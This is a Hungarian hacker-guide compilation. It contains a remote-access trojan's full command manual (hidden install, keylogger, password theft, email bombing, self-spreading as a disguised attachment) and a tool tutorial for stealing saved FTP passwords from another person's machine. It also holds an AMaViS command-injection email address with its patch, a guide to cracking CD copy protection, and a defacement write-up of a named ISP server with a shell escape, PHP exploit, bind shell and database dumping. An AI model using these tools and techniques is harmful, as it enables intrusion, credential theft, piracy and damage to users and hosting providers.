löjjük ki! =) A távoli admin trojanok egyszerűen nyitnak egy portot a gépen és onnantól bárki felcsatlakozhat rá. Persze le lehet jelszavazni a szervert, vagy esetleg átállítani a portot, és akkor csak az férhet hozzá aki felrakta. (Vagy aki feltörte a jelszót =)) A RAT (Remote access trojans) programok talán az egyik legjobban kitalált programok, amiktől ha profin van feltéve a rendszerre elég nehezen lehet megszabadulni, hát ha még láma is az illető. =)) Azok viszont akik használják ezeket a programokat vigyázzanak mert könnyen visszafelé fordulhat a támadás és magukat fertőzhetik meg. Találkoztam már olyannal, hogy egy trojai kliens részéhez hozzá volt fűzve a szerver rész is, szóval aki jót akart szórakozni másokkal az lehet hogy saját maga vált áldozattá, ha elindította a klienst. (Nálam megszívta mert a TaskInfo és a Registry monitor egyből kiszúrta. =)) Jelszó lopó trójai programok: Ezeknek a trójai programoknak az a

feladatuk, hogy összegyűjtsék az áldozat PCjéről az összes fellelhető, elmentett jelszót és/vagy jelszó fájlt (amikből majd megfejthető a jelszó) és elküldik egy meghatározott e-mail címre vagy icq számra, úgy, hogy azt az áldozat nem veszi észre. Vagyis saját kis e-mail/üzenet küldő programmal rendelkeznek. Szóval senki se keresse az Outbox/Kimenő levelek mappában a levelező programjában! =) Billentyűzetfigyelők: Ezek a trójai programok nagyon egyszerűek. Mindössze naplózzák az áldozat Pc-jén a bekapcsolástól a kikapcsolásig leütött öszes billentyűleütést. Ezek a trójaik is elindulnak automatikusan minden windows indításkor, tehát csak egyszer kell elindítani őket, és onnan már csak a log file megszerzése az egyetlen gondd! Van olyan opciójuk is, hogy ha érzékelik, hogy online van az áldozat és a keylog feltevője is online van akkor nem log fileba írja a leütéseket, hanem azonnal elküldi a támadónak. Romboló

trójai programok: Ezeknek a programoknak 1 céljuk van a rombolás. Ha már rajta vannak az áldozat gépén, és nem veszi időben észre akkor már késő bánat. Ezek automatikusan letörlik a beállított file-neveket pl.: *.dll *.ini és *.exe nevű fileokat a számítógépről 17 Hackers’ Guide FTP trojai programok: Ezek a trójai programok megnyitják a gépeden a 21-es (FTP) portot és gyakorlatilag a géped átvedlett egy FTP szerverré. Fel és le lehet tölteni a gépedre/ről Törölni lehet róla, átnevezni. Gyakorlatilag a kliens kezében egy file manager van, ahol viszont a szerver lehet több 1000 km.-re is Eredeti: tH3 m4n!4c dancho@mbox.digsysbg - H3XR00T http://hexnet.hpage net/ * me$$iah trojai program "Kiskoromból emlékszem, hogy már a farkas tetszett a mesében." Bevezetõ: Ebben a leírásban a mE$$iAh-nak keresztelt trójai programomat fogom bemutatni. Ha nem tetszik, nem kell elolvasni. Létezik ennek a doksiknak egy angol változata

is, de tekintve hogy a nyelvet milyen magas szinten beszélem, nagyon jól sikerült :) Hadd emeljek ki pár ízelítõt a program számtalan lehetõsége közül:) - a távoli számítógépet akár a mobiltelefonodról is vezérelheted! Hogy hogyan?! Nagyon egyszerû, csak küldd el a telefonodról sms-ként egy email címre az utasításokat, és a szerver végre fogja õket hajtani. (persze azért ne essünk túlzásokba, arra a címre kell küldeni amit elõtte beállítottál :)) - akár több gépet is vezérelhetsz egyszerre a mobilodról!! - küldhetsz emailbombát. és még az IP-d miatt se fog felhívni az internetszolgáltatód, hogy rosszat játszottál :) Ugye nem hangzik rosszul? :) Egy kis elõzmény: 18 Hackers’ Guide Eddig csak egy béta verzió volt elérhetõ, kizárólag ismerõsök számára, teszt céljából. Sajnos elég kevés visszajelzést kaptam Szóval bármi ötleted észrevételed van, nyugodtan megírhatod. Mi az új a mE$$iAh v1.0 -ban?

20000818 [*] Új readme file, kijavíttam az angol hibákat, továbbá ez a magyar verziója is idekerült :) [*] volt egy bug, vagyisinkább figyelmetlenség, miszerint kétszer be lehetett indítani a szervert. Na ezt kijavítottam [+] Van egy adag új parancs: MD, RD, DIR, STARTKL, STOPKL, STARTFTP, STOPFTP, STARTBOMB, STOPBOMB, MSGSHOW, WALLP, CACHEPWZ, SLEEP, SOUND, LISTPROCESS, KILLPROCESS, DONTDELETE, INFECT [-] A PWZ parancs már nem elõ, helyette lehet használni a RASPWZ-t. [+] Elkészült a makeserver is, amit stílusosan tHe G0D-nak neveztem el, lehet vele saját szervert csinálni :) [*] A klienst is újraírtam (:-) és persze új neve is van: mADaNgEl. Köszönet a logóért Nestan-nak! (meg különben is érdemel egy nagy thankset a grafikai segítségeiért) [*] Az MSG parancs is megváltozott, ezentúl MSGDRAW néven érhetõ el. [*] Kicsit optimalizáltam a kódon. [+] A szerver három véletlenszerû fájlnevet használ arra, hogy hova másolja magát a

WINDOWSSYSTEM könyvtáron belül. [+] Formater is sokat segített, részletes bug-leírással, stb. Sõt, készíti a linuxos klienset!. Nagy nagy köszönet! Fájlok: madangel.exe- ez a kliens - mérete: 307200 messiah.exe- ez a szerver - mérete: 196608 readme.txt- ez az, amit éppen olvasol - mérete: XXXXXX thegod.exe- ez a makeserver - mérete: 142336 A szerver lehetõségei: [a példák ilyen zárójelekben vannak] Installálás: - a szerver rejtõzködve installálja magát - és automatikusan indul minden windowsindításnál. Megjegyzés: Az installáláshoz elég beindítanod a szerver exe-jét, és utána akár le is törölheted, hiszen a szerver úgyis belemásolja magát a system könyvtárba! Beállítások: - a szervert levédheted jelszóval, az alapértelmezett: SPY [+PASWújjelszó] 19 Hackers’ Guide - a szerver alapértelmezett portja 2000, és ezzel a paranccsal megváltoztathatod: [+PORTújportszám] - leállíthatod a szervert [+CLOSE] - és el is

távolíthatod a géprõl, ezután nem fog beindulni többet [+REMOVE] - beállíthatod a POP3 hostot, amin keresztül emailben elérheted a szervert: [+POPHSTpéldahost] - Ehhez meg kell adnod a felhasználónevet [+POPUSRpéldafelhasználó] - És az ehhez tartozó jelszót: [+POPPWDpéldajelszó] - beállíthatod az SMTP-t, hostját: [+SMTPHSTpéldahost] - Meg kell adnod, hogy mi legyen az emailcím eleje ha a szerver levelet küld, a cím vége pedig az smtp hostja lesz [+SMTPUSRpéldauser] - És beállíthatod azt az emailcímet, ahova a szerver fogja küldeni a leveleket: (pl. email értesítés ha a szerver online) [+SMTPS2példaemailcím] - beállíthatod a POP ellenõrzés gyakoriságát (az alapértelmezett 60000századmásodperc) [+TIMERpéldaszázadmásodperc] Megjegyzés: Mindhárom POP beállítást meg kell adnod hogy emailben/mobilról vezérelni tudjad a szervert, illetve hogy emailben tudj feltölteni fájlt. Ha az SMTP beállításokat is kitöltöd, akkor már

kaphatsz email értesítést, amikor a szerver számítógép a netre kapcsolódik. A szerver az online állapotot idõszakosan ellenõrzi, a gyakoriság beállításához a TIMER parancsot használhatod, lásd feljebb. Addig nem tudod mobilról irányítani a gépet, amíg nem állítod be megfelelõen a POP3-as dolgokat. Fájl kezelés: - elindíthatsz fájlt a szerveren: [+EXECbeindítandófájl paraméter] - törölhetsz a szerverrõl fájlt: [+DELtörlendõfájl] - másolhatsz fájlt a szerveren [+COPYforrásfájl célkönyvtár] - áthelyezhetsz fájlt a szerveren, (ez akár átnevezés is lehet) [+MOVEforrásfájl újneve] - elküldetheted emailben a fájlt, amit meg akarsz szerezni a szerverrõl [+GFILEmelyikfájlttöltsükle] - könyvtárat hozhatsz létre a szerveren [+MDkönyvtárnév] - le is törölhetsz könyvtárat (akárcsak a deltree, tehát rekurzívan!!) [+RDkönyvtárnév] - kilistázhatod a fájlokat a szerveren (az alapértelmezett *.*) pl: 20 Hackers’

Guide [+DIRc:*.*] - a szerverrel továbbküldheted magát egy megadott emailcímre clinton.jpgexe néven, és a tárgy valami nagyon vicces lesz :) [+INFECTutálunk@billi.com] Megjegyzés: Így akár emailen keresztül is lebonyolíthatod a fájlforgalmat. Feltöltéshez a POP beállításoknak rendben kell lenniük, és arra az emailcímre amit megadtál, simán csatold el a fájlt. Persze ez elég körülményes, használd inkább a szerver FTP szerverét :) Vegyes: - cd tálca kinyitása [+CDOPEN] - cd tálca bezárása [+CDCLS] - monitor kikapcsolása [+MONOFF] - monitor bekapcsolása [+MONON] - aktuális ablak/program bezárása [+CAW] - üzenetküldés ablakban [+MSGSHOWEz egy példa üzenet] - üzenetküldés rajzolva [+MSGDRAWEz egy példa üzenet] - háttérkép megváltoztatása, pl: [+WALLPc:logo.sys] - hang lejátszása, pl: [+SOUNDc:windowsmediaThe Microsoft Sound.wav] Számítógép: - suspend módba kapcsolás [+SUSP] - gép újraindítása [+REBOOT] - gép

kikapcsolása [+POWER] - gép lefagyasztása [+LOCKUP] - keyloggolás indítása (az alapértelmezett mentési hely C:WINDOWSSYSTEMWINA386.DLL) [+STARTKL] - szerver leállítása [+STOPKL] - FTP server indítása [+STARTFTP] - FTP server leállítása 21 Hackers’ Guide [+STOPFTP] - emailbomba küldése (paraméter nélküli parancs esetén az elõzõ címzettnek fogja a bombát küldeni a szervert) [+STARTBOMBemailcím] - bombázás leállítása [+STOPBOMB] - fél percre leállíthatod a szerver parancsfeldolgozását Ez pl arra jó, ha több parancsot küldesz egyszerre: [+CDOPEN+SLEEP+MSGSHOWyou fuck+SLEEP+OPENCD] Megjegyzés: a gépkikapcsolás NT alatt asszem nem mûködik. A lefagyasztásnak viszont mûködnie kell(ene). Az emailbombázás addig megy, amíg le nem állítod Információk: - RAS jelszavak lekérése [+RASPWZ] - cache-ben tárolt jelszavak lekérése [+CACHEPWZ] - aktuális felhasználónév [+CUSER] - windows könyvtár [+WDIR] - aktív processzek

lekérdeséze [+LISTPROCESS] - futó processz lelövése [+KILLPROCESSprocessazonosítóbetûje] Utolsó megjegyzésem:): a mobilon keresztüli vezérléshez az POPUSR@POPHST címre kell küldened az sms-t. A parancsoknak a tárgyban kell lenniük Egyszerre több parancsot is használhatsz, pl: +CDOPEN+MSGSHOWKapd be!+LOCKUP Ha több gépet is szeretnél egyszerre vezérelni, akkor mindegyiknek ugyanazt a POP kiszolgálót kell megadni és persze ugyanazt a mailboxot. Ezután a parancsot a következõképpen küldheted: [+DONTDELETE+MSGSGOWhello] Mindegyik gép végre fogja hajtani a parancsot, egészen addig amíg nem küldesz egy olyan üzenetet amiben nincs benne a +DONTDELETE parancs. Pl: [+MSGSGOWstop!] Eltávolítás Az eltávolítás legegyszerûbb módja +REMOVE parancs küldése a szervernek. Manuális eltávolításhoz kövesd az alábbi lépéseket: töröld a JYService regisztri bejegyzést az alábbi címrõl: 22 Hackers’ Guide HKEY LOCAL

MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices Utána töröld le a C:WINDOWSSYSTEMJ4YSRV.EXE és/vagy C:WINDOWSSYSTEMWINAPI.EXE és/vagy C:WINDOWSSYSTEMMAPISRV.EXE fájlokat. A szerver a beállításokat szintén a regisztriben tárolja: HKEY LOCAL MACHINESoftwareSpy Természetesen ezt is törölheted. Köszönet Formater - ez a program nem jöhetett volna létre a segítséged nélkül! Nestan - köszi mindent, de akkor sem hiszem el hogy iszol :))) skYro - kezdõ krekk lépéseim :) Xanthos - sok sok mindent köszönhetek már :) GutyKa - hogyhogy nem vettem észre a te trojanodat korábban? Yamin - ötöst kapni számtekból, ehhh :) $tephen - aki elindított az underground pályán :) Trevor - elsõ fordításaim :)) Taki - akinek az ötlete volt ez az egész trójan dolog :) Asdef Gehaj - NT tesztelés :) Sun-Zero - izé egész jó dolog ez a hákker élet :))))))))))))))))))) Pepe - support rulez :) "I hate people that are lame." /Offspring/ Szóval a

seggfejek bekaphatják. Te is MadMind! Ennyi! Asszem elmondtam mindent, amit tudnod kell. Ha van kérdésed írj De azért ezt a fájlt olvasd csak át elõtte mégegyszer, mert különben leharapom a fejedet. :) Az emailcímem:rsctm@freemail.hu Megpróbálok minden levélre válaszolni Ha a linux klienssel kapcsolatban vannak kérdéseid, írj Formaternek:formater@thepentagon.com Enjoy. -=|R|S|C|=- * RSCs Offline Server Emulator 23 Hackers’ Guide Egy kis bevezetõ A programmal bármilyen interneten keresztül kommunikáló kliensprogram jelszavait kinyerhetjük. Így használható email kliensekhez, FTP kliensekhez, stb Most joggal kérdezheted, hogy mi szükség van erre, ha létezik többezer "kicsillagozó" program. Hát azért, mert pl. a Far Manager FTP kliens részéhez, vagy a The Bat jelszavaihoz azok a programok nem használhatók. Egy hasonló program, a MailPSW adta az ötletet, hogy készítsem el ezt a progit. Gyakorlatilag az RSC-Emu ugyanarra a

lehetõségre építkezik, csak sokkal sokoldalúbban használható. Hogy hogyan is mûködik a dolog? A kliens programok legtöbbje rendelkezik egy olyan lehetõséggel, hogy a jelszót elmenti valamilyen kódolt formában, hogy azt ne kelljen annyiszor beírni. Aztán amikor szükség van rá, akkor a program dekódolja a jelszót, és elküldi a szervernek. (Szükséges, hogy dekódolható algoritmussal kódolt jelszavakról legyen szó, különben maga a kliens program sem tudna semmit sem kezdeni velük, mikor kell.) Ez viszont azt jelenti, hogy a tranzakció közben a kliens kiadja a jelszót, és ez lehetõséget ad egy univerzális jelszóvisszaállítási lehetõségre, a szerver emulálásra. A program mûködésének alapja a Microsoft TCP/IP stack host kezelése, ami ugyanis lehetõvé teszi, hogy egy akármilyen host-hoz másik IP-t rendeljünk. Az RSCemu tehát a kérdéses host-hoz ideiglenesen hozzárendeli a 127001-et (gyk localhost) ahol a megadott porton már nyitott

egy olyan szerversocket-et, ami minden kapott adatot kiír a képernyõre. Persze a dolog ennél azért egy kicsit bonyolultabb. A jelszóküldés ugyanis a tranzakciónak nem az elsõ lépése. Ezért van lehetõség saját protokollok definiálására is, vagyis mi adhatjuk meg azt, hogy a szerver mit válaszoljon a kliensnek. Az elsõ sort mindig a szerver kezdi, ha bármit ki akarunk hagyni, akkor egy üres sort szúrjunk be. Az FTP és POP3 kliensek számára elkészítettem azt a pár sort, ami szükséges ahhoz, hogy a kliens kiadja a jelszót. Használati utasítás :) 1. Indítsuk el 2. Töltsük ki a szükséges információkkal 3. Nyomjuk meg a Start server gombot 4. Csatlakozzunk a kliens programmal 5. Lessük meg az eredményeket 6. Stop server gomb megnyomása 7. Ha bármi probléma történik közben, pl lefagy a Windows, akkor a program nem tudja letörölni a C:WINDOWShosts állományt, ez esetben ezt nekünk kell megtenni "kézzel"!! Lássuk egy példán

keresztül. Tegyük fel, hozzáférünk hirtelenjében egy számítógéphez, amin van Far, és használják is az ftp kliens részét. Akkor beindítcsuk szépen gyorsan a programot, és az RSC-emu -t is, host-nak beírjuk azt, ahonnan meg akarjuk tudni a jelszót, pl lamerka@ftp.extrahu és mivel FTP-rõl van szó, kiválasztjuk az FTP jelölõnégyzetet. A Start server 24 Hackers’ Guide gombbal elindítjuk a dolgot, Far-ral nyomunk egy entert az ftp.extrahu -n, ki is írja, hogy a jelszó nem megfelelõ, de láss csodát az RSC-emu-ban ott virít a lamerka@ftp.extrahu-hoz tartozó jelszó Stop szerver gombra ráütünk még egyet, aztán lelépünk a tett helyszínérõl. Bugzás? RSCs Offline Server Emulator nem mûködik az olyan kliens programok esetén, amik nem hostnév alapján, hanem IP cím alapján keresik a szervert. (Pl 1945812711-et használ valamilyenszerver.com helyett) Ekkor, ha van rá lehetõség, állítsd át 127.001 -re Néhány program megengedi, és

így máris tökéletes lesz a dolog Letöltés - Töltsd le innen az RSCs Offline Server Emulator-t -=R|S|C=- rsctm@freemail.hu lamerz can fuck off * AMaViS root exploit Chris McDonough <mcdonc@IQGROUP.COM> AMaViS: berkezo levelek virusellenorzesere valo program. A tamadonak lehetove teszi, hogy parancsot futtasson a gepen root-kent. Virusos level kuldesenel a REPLY-TO mezot kezeli hibasan. A virusjelentest kuldo script egyik sora: cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $7" $2 Ami a $2-t szepen vegrehajtja . Gyors patch: --- scanmails.orig Wed Jun 30 12:54:02 1999 +++ scanmails Wed Jun 30 12:54:15 1999 @@ -122,6 +122,50 @@ deliver=/usr/bin/procmail 25 Hackers’ Guide + ############################################################ ### +# Chris McDonough informed us, that it is possible to execute # +# programs by sending an email, wich contains a virus and has # +# as return address something like: # +# `/sbin/reboot`@softing.com # +# or # +#

$(/sbin/reboot) @softing.com # +# The execution of the command (/sbin/reboot) is done by the # +# "mail" program. Therefore we parse the arguments in order # +# to substitute those characters to nothing # + # # +# Wed Jun 30 11:47:55 MEST 1999 # + ############################################################ ### + +# substitute all "`","$(",")" to nothing +receiver=${7//`/} +receiver=${receiver//$(/} +receiver=${receiver//)/} + +sender=${2//`/} +sender=${sender//$(/} +sender=${sender//)/} + +if [ "$sender" != "$2" -o "$receiver" != "$7" ] ; then + cat <<EOF | ${mail} -s "Intrusion???" ${mailto} + ############################################################ ### +# Chris McDonough informed us, that it is possible to execute # +# programs by sending an email, wich contains a virus and has # 26 Hackers’ Guide +# as return address something like: # +# `/sbin/rebbot`@softing.com # +# or #

+# $(/sbin/rebbot) @softing.com # +# The execution of the command (/sbin/rebbot) is done by the # +# "mail" program. Therefore we parse the arguments in order # +# to substitute those characters to nothing # + # # +# Wed Jun 30 11:47:55 MEST 1999 # + ############################################################ ### + $7 or $2 is not a valid Email address + (changed to $receiver and $sender)! +EOF +fi +# + ################################################ # main program # # -------------# @@ -171,8 +215,8 @@ echo xxxxxxxxxxxxxxxxxx`date`xxxxxxxxxxxxxxxxxxxxxxx > ${tmpdir}/logfile echo ${scanscriptname} called $* >>${tmpdir}/logfile -echo FROM: $2 >>/${tmpdir}/logfile -echo TO: $7 >>/${tmpdir}/logfile +echo FROM: $sender >>/${tmpdir}/logfile +echo TO: $receiver >>/${tmpdir}/logfile ${metamail} -r -q -x -w ${tmpdir}/receivedmail > /dev/null 2>&1 @@ -597,11 +641,11 @@ ################### send a mail back to sender ######################

27 Hackers’ Guide -cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $7" $2 +cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $receiver" $sender VIRUS ALERT - Our viruschecker found a VIRUS in your email to "$7". + Our viruschecker found a VIRUS in your email to "$receiver". We stopped delivery of this email! Now it is on you to check your system for viruses @@ -614,12 +658,12 @@ ############### send a mail to the addressee ######################## -cat <<EOF| ${mail} -s "VIRUS IN A MAIL FOR YOU FROM $2" $7 +cat <<EOF| ${mail} -s "VIRUS IN A MAIL FOR YOU FROM $sender" $receiver VIRUS ALERT + Our viruschecker found a VIRUS in a mail from "$2" "$sender" to you. Delivery of the email was stopped! -Kis-Szabo Andras -----------------------------/ kisza@sch.bmehu Technical University of Budapest Schonherz Zoltan Dormitory /-------------------------------3OO---->>.Info * CD-k

másolásvédelmének megszüntetése Felhasznált dokumentum: "Hack-FAQ <Volume 5>" /Wang/ 28 Hackers’ Guide Itt van a leggyakoribb CD-védelmek listája. A CD-védelem arra szolgál, hogy a játékokat és alkalmazásokat ne tudd lemásolni. A legtöbb program és fájl, amire alább hivatkozok, a http://www.cdrsoftcom címrol származik CD-Cops Ha a CD a CD-Cops-al van védve, akkor a fo .exe fájl indításakor egy ablak jelenik meg a fejlécében a "CD" és "Cops" szavakkal. Továbbá a következo fájlok az install könyvtárban vannak: CDCOPS.DLL, és fájlok .GZ és W X kiterjesztéssel Ezt a típusú védelmet a "CD-Cops decrypter" nevu programmal lehet megtörni, amely a legtöbb CD-vel muködik. Copylok Nincs róla adat. Copy-Protected CD & The Bongle Jelenleg nincs általános patch, minden egyes CD-hez külön kell cracket keresni. DiscGuard Egy DiscGuard-dal védett CD install könyvtárában vannak az alábbi

fájlok: IOSLINK.VXD IOSLINK.SYS Jelenleg nincs általános patch, minden egyes CD-hez külön kell cracket keresni. LaserLock A Laserlock-kal védett CD-ken van egy rejtett könyvtár, "Laserlok" néven. Ebben a könyvtárban olyan fájlok vannak, amelyek olvashatatlan hibákat tartalmaznak, hogy a CD-t ne lehessen rendesen lemásolni. Jelenleg nincs általános patch, valószínuleg minden CD-hez külön cracket kell keresni. Néhány esetben a védelem megkerülheto, ha a CD-író programban beállítjuk az "Ignore Read Error" lehetoséget (CDRWin, Nero, DiskJuggler). LockBlocks A LockBlocks-védett CD két kört tartalmaz (egy 5mm és egy 3 mm szélességut), ezek a CD-írót kifagyasztják. Jelenleg nincs általános patch, minden egyes CD-hez külön kell cracket keresni. SafeCast Jelenleg nem ismert a felderítése. SafeDisc A következo fájloknak kell a CD-n lenni: 29 Hackers’ Guide 00000001.TMP CLCD16.DLL CLCD32.DLL CLOKSPL.EXE GAME.EXE (a game a

játék neve) GAME.ICD (a game a játék neve) A megtöréséhez készíts egy 1:1 másolatot a CD-rol, aztán használd a "Generic SafeDisc Patch" -et (http://www.cdrsoftcom), ez lehetové teszi, hogy futtasd a másolatot. Egy másik módszer, hogy keresel egy patchelt gameexe-t, és utána a következoket csinálod: Készíts egy image-t a CD-rol a harddiskre, de a game.exe-t cseréld ki a patcheltre A CD-író meghajtót használd az image kinyerésére, mert sokkal jobban kivédi az olvasási hibákat. Utána írd fel az image-t egy üres CD-re, egyszeres sebességgel (ez hibavédettebb). SecuROM A CD install könyvtárában vagy a root könyvtárban a következo fájloknak kell lenniük: CMS16.DLL CMS 95.DLL CMS NT.DLL A védelem kinyírásához használd valamelyik általános patchet az alábbiak közül: SecuROM R1-hez: Generic SecuROM R2 SecuROM R2-höz: Generic SecuROM R3 SecuROM R3-hoz: Generic SecuROM R4 v1.1 SecuROM R4-hez: Generic SecuROM R5 v5.1 SecuROM

R5-höz: Generic SecuROM R5 v6.0 Bazinagy fájlok Keress bazinagy fájlokat a CD-n, gyakran 600megánál is nagyobbakat, a rootkönyvtárban (általában .AFP kiterjesztésuek) Ha a CD kisebb, mint 659 megás, akkor egy egyszeru CD másolással megoldható a dolog, de ha nagyobb, akkor csinálj egy túlméretes 74 perces CD-t (OverSize) vagy használj 80 perces üres CD-t. Illegal Table Of Contents (TOC) fájl Meg kell nézni a CD-n levo trackeket. Általában úgy tunik, mintha lenne egy második adat-track (ami tilos). Általában néhány audio track után jön ez a második adat-track Ez a fajta másolásvédelem most már kikerülheto pl. a Nero-val vagy a CDRWIN programokkal. Ezeknek van egy olyan beállításuk, hogy figyelmen kívül hagyják a hibás TOC fájlt. CD-túlégetés (OverBurning CDs) 30 Hackers’ Guide Felismeréséhez egy 74 perces írható CD-t használj, és az írás elott csinálj egy tesztet. Ha az eredeti CD-t túlégették, a CD-író program hibát

fog jelezni, miszerint a CD nem elég nagy (még ha az eredeti és az írható CD is egyaránt 74 perces!!). Használj Nero-t vagy CDRWIN-t, és égesd túl a CD-t egy megfelelo CD-író meghajtóval (tehát nem mindegyikkel lehet). Veszélyes lehet a muvelet, ha a CD-íród nem támogatja a túlégetést! Ha az eredeti CD 74 perces, akkor második lehetoségként vegyél egy 80 perces írható CD-t és írd rá arra. A Half Life, a Kingpin és a Commandos is ezt a típusú védelmet használja. Fizikai hibák A CD direkt meg van rongálva. Sok CD-olvasó nem tudja másolni ezeket a hibákat és leállnak az olvasással. Néhány CD-olvasó viszont tudja A "Blindread" nevu program viszont nagyon hasznos lehet az ilyen védelem kikerülésére. PlayStation CD-k A bootolás alatt a PSX chipset ellenoriz egy ismeretlen szektort a CD-ken. Ezt a szektor a CD-olvasó fej nem tudja elérni. Emiatt nem lehetséges, hogy lemásold a CD-t. A kikerüléséhez vegyél egy módosított

Boot chipet (ModChip) és cseréld ki a Playstation-ban levovel. Ez megtéveszti a PlayStationt, tehát ezentúl azt gondolja majd, hogy a berakott CD a megfelelo ország-azonosítókat és szektorokat tartalmazza. Sega DreamCast CD-k A Dreamcast valójában GD-ROMokat használ, amelyek maximum 1GB adatot tartalmazhatnak a standard CD-k 650/700MB-jával szemben. Ez jó másolásvédelmet jelent, mert egy egyszeru CD-íróval nem lehet ilyen lemezeket írni. A GD-ROM-on 2 adat-track található. Az elso mérete gyakran 10MB - 50MB között van és egy normál CD-olvasóval olvasható. A második nagy suruségu formátumban van felírva, és egy normál CD-olvasó nem tudja olvasni. Jelenleg nincs tökéletes módja ezeknek a CD-knek a másolására. * amstel.interwarehu feltörése This Site owned by : 31 Hackers’ Guide Udv az osszes nagyfeju ISP rendszergazda/security gurunak (aka: GRIN, GUSKAHAX0R, MAG, CYD, MicMac, Bivanbi, KalverKocsog, Atya-Bazsa es az osszes LME geci).

Ez a deface azert keszult, hogy bebizonyitsuk magyarorszagon nem csak obotakgeci, dc1geci, madmindgeci szintu scriptkiddie like "allitolagos hackerek" leteznek. Kicsit nevetseges az ami a mediaban manapsag csinal a hozza nemerto lamer alatokbol. Ezert itt egy prezentacios hack ! =) A tamadas az INTERWARE egyik "kisegito" szervere ellen iranyult. Mi is tortent itt. (Aki nem hiszi el az jarjon utanna, bar mi az igazat irjuk le) : • Adott volt egy sniffelt account (switchelt halorol szereztunk, erdekes erre mondjak azt hogy nem sniffelheto ? Lenyegtelen, csak okoskodnak :) • Az account mogott egy szerver volt: amstel.interwarehu A szerveren ssh service. A sniffelt accountnak volt SSH elerese shellje a pine nevu levelezokliens. • A pine nem okozott komolyabb problemat, egy /bin/bash -c /bin/bash; alternativ editor gyorsan dobta a shell-t. • Ezutan ismerkedtunk meg a rendszerrel: o 2.217-es linux kernel o A kernelben ott vigyorgott a cryptopatch o Egy

darab C fordito sincs kozel s tavolban. o Nagyon jol felkonfigolt packetfilter (ipchains). A pop3 port pl kernel/ipchains-bol filterezve,stb. (ha netan a daemonban bug lenne ? :))) o Jol belott syncookies,rpfilter vedelem o tripewire, portsentry vedelem o Debian 2.2 distribucio, a legfrissebb fixekkel o Uj Glibc o Uj traceroute o hostconf-os trukk nem megy, kernel tul regi hozza (szerencsejukre) o szeparalt filerendszer, nosuid, noexec, stb. (hardlink attack eleve kizarva) bash-2.03$ mount 32 Hackers’ Guide /dev/sda5 on / type ext2 (rw,errors=remountro,errors=remount-ro) proc on /proc type proc (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/sda1 on /boot type ext2 (ro) /dev/sda6 on /home type ext2 (rw,noexec,nosuid,nodev) /dev/sda7 on /var type ext2 (rw,nosuid,nodev) /dev/sda8 on /var/mail type ext2 (rw,noexec,nosuid,nodev) /dev/sda9 on /var/lib/mysql type ext2 (rw,noexec,nosuid,nodev) o szeparalt web groupok (kb 50 darab kulonbozo group a

www-data alatt, amelyekhez kulon auth tartozik.) o semmilyen folosleges daemon, csak ami a mukodeshez kell o Erosen leredukalt setuid allomany, amin nem kell hogy feltetlenul setuid legyen, azon itt tuti nincs :) o a /etc/apache csak root szamara OLVASHATO!!! Nem is lathattuk, hogy mi van benne. o Localis security magas szintu. o Userek konyvtarai abszolut szeparaltak, egyetlen user sem kepes olvasni mas user adatait. o Szeparalt administrator reteg. (csak par usernek van rendes shellje) o A mi userunk veletlenul kiemelten powerfull volt, a legtobb usernek /bin/false a shellje • Szoval meg a MAG koma sem mondhatja azt, hogy ez egy tipikus "szar" gep. MERT TENYLEG NEM AZ. • Tisztelet a rendszergazdaknak, ennyire szeparalt rendszert karban tartani meg szerintunk is komoly munka :) Vagy nagyon megfizetik ezert oket, vagy mazochista allatok. (UGYE MAG ? Vannak olyanok akik nem predikaljak, hanem csinaljak ???) A local HACK: • Ugyebar mint azt leirtuk,

./-es local exploitot el lehet felejteni, a szokasos mokakat is lehet elrakni. Ami itt jon az tenyleg a "FEELING" • Nonpublic PHP exploiton keresztul sikerult krealnunk egy shell-t amelynek euid-ja, egid-je www-data volt. bash-2.03$ id uid=33(www-data) gid=1001(uzlethaz) groups=1001(uzlethaz) 33 Hackers’ Guide • Ezzel mar minimalisan hozzafertunk par filehoz, de ezutan szembesultunk vele, hogy a www-data group nem tud olvasni szinte semmit, mivel a webgroupok kulon szeparaltak. • Egy ujabb rogtonzott megoldassal a phpn keresztul csinaltunk egy bash on port-ot, melyet teljes jogulag az apach futtatott, igy hozzafertunk a szeparalt groupokhoz. • Innentol mar mindenhez hozzafertunk amihez az apach hozzafert. Kezdve az osszes hostolt oldal osszes adatahoz. bash-2.03$ telnet 0 1111 Trying 0.000 Connected to 0. Escape character is ^]. Gimme pass: * sh: no job control in this shell sh-2.03$ id id uid=33(www-data) gid=33(www-data)

groups=33(www-data),1005(planetweb),1006(web), 1007(agility),1008(foldnapja),1009(grafo),1010(e-start),1011(pitvar),1012(danubi anadesign),1013(szinyei),1014(bignet),1015(fizetesinfo),1016(thr),104(loggers),1 017(canderel),1018(portar),1019(windrivers),1020(trax),1022(gfkdorelipms),1023(k ioszk),1024(regiszter),1025(pityer),1026(telepito),1027(e-contact),1028(tutynet) ,1029(afilmsite),1030(loyolacollege),1031(webkom) • Egy kis lokalis hiba (rosszul beallitott UMASK), hogy a webgroup-ok nagy resze mar eleve tudta irni a html-eleket, tehat mar a rendszer nagy reszet itt tudtuk volna defacelni. • Mivel a legtobb host hasznalt mysql-t igy azokok teljes adatbazisat dumpolni tudtuk (nemhiaba, szuper ottlet a database.conf-ban tarolni a mysql usert, passwdt) • A rendszer elonyere legyen irva: a mysql total szeparalt meg localhostrol is, a mysql adatbazist nem tudtuk elerni egyetlen user jogosultsagaval sem.) • az /etc/mysql/my.cmf nem tartalmazott semmilyen jelszot Ez ergo

